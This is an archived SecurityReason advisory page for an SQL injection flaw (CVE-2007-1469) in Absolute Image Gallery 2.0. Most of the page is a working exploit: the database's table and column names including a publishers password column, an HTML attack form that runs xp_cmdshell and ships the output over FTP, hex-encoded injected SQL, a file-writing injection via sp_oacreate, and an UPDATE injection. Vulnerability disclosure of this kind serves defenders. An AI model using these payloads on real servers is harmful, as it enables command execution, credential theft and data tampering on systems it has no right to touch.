|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2429 CVE : CVE-2007-1469 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : UniquE-Key Published : 20.03.2007
Advisory Content : Absolute Image Gallery Gallery.ASP (categoryid) MSSQL Injection Exploit Type : SQL Injection Release Date : {2007-03-15} Product / Vendor : Absolute Image Gallery http://www.xigla.com/absoluteig/ Bug : http://localhost/script/gallery.asp?action=viewimage&categoryid=-SQL Inj- ------------------------------------------------------------------------ --------------------------------------------------------------------- Script Table/Colon Name : ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : articlefiles fileid filetitle filename articleid filetype filecomment urlfile ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : articles articleid posted lastupdate headline headlinedate startdate enddate source summary articleurl article status autoformat publisherid clicks editor relatedid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : iArticlesZones articleid zoneid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : plugins pluginid pplname pplfile ppldescription ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : PPL1reviews reviewid articleid name reviewdate review comments isannonymous ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : publishers publisherid name username password additional plevel ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : publisherszones publisherid zoneid ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGcategories categoryid catname catdesc supercatid lastupdate catpath images allowupload ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGimages imageid imagename imagedesc imagefile imagedate imagesize totalrating totalreviews hits categoryid status uploadedby additionalinfo embedhtml keywords copyright credit source datecreated infourl ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : xlaAIGpostcards dateposted postcardid imageid bgcolor bordercolor fonttype fontcolor recipientname recipientemail greeting bgsound sendername senderemail sendermsg ------------------------------------------------------------------------ --------------------------------------------------------------------- Table Name : zones zonename description template articlespz zonefont fontsize fontcolor showsource showsummary showdates showtn textalign displayhoriz cellcolor targetframe ------------------------------------------------------------------------ --------------------------------------------------------------------- MSSQL CMD Injection Exploit(For DBO Users) : <title>Absolute Image Gallery MSSQL CMD Injection Exploit</title> <body bgcolor="#000000"> <form name="Form" method="get" action="http://localhost/script/gallery.asp"> <center><font face="Verdana" size="2" color="#FF0000"><b>Absolute Image Gallery MSSQL CMD Injection Exploit</b></font><br><br></center> <center><font face="Verdana" size="1" color="#00FF00"><b>Note : For DBO Users</b></font><br><br></center> <center><font face="Verdana" size="1" color="#00FF00"><b>Example :</b></font><br><br></center> <tr> <center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br> <center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td> <td> </td> <td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c: > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+ *+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td> </tr> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td> <td> </td> <td> <select name=""> <option value="0">(CMD)</option> </select> <br><br> <input type="submit" value="Apply"></center> </td> </tr> </table> </form> <center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG [email concealed]</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center> ------------------------------------------------------------------------ --------------------------------------------------------------------- Code Injection(For DBO Users) : Add Table : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;Creat e+table+code+(txt+varchar(8000),id+int);-- ASCII Code Add Database : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla re+@q+varchar(8000)+select+@q=0x696E7365727420696E746F2066736F3737372874 78742C6964292076616C7565732827272C3129+exec(@q);-- Code Injection : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1;decla re+@txt+varchar(8000);select+@txt+=+(select+top+1+txt+from+code+where+id +=+1);declare+@o+int,+@f+int,+@t+int,+@ret+int+exec+sp_oacreate+'scripti ng.filesystemobject',+@o+out+exec+sp_oamethod+@o,+'createtextfile',+@f+o ut,+'c:/host',+1+exec+@ret+=+sp_oamethod+@f,+'writeline',+NULL,+@txt;-- ------------------------------------------------------------------------ --------------------------------------------------------------------- UPDATE(ALL users) : http://localhost/script/gallery.asp?action=viewimage&categoryid=-1 UPDATE table SET colon = 'x';-- ------------------------------------------------------------------------ --------------------------------------------------------------------- Tested : Absolute Image Gallery 2.0 Vulnerable : Absolute Image Gallery 2.0 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |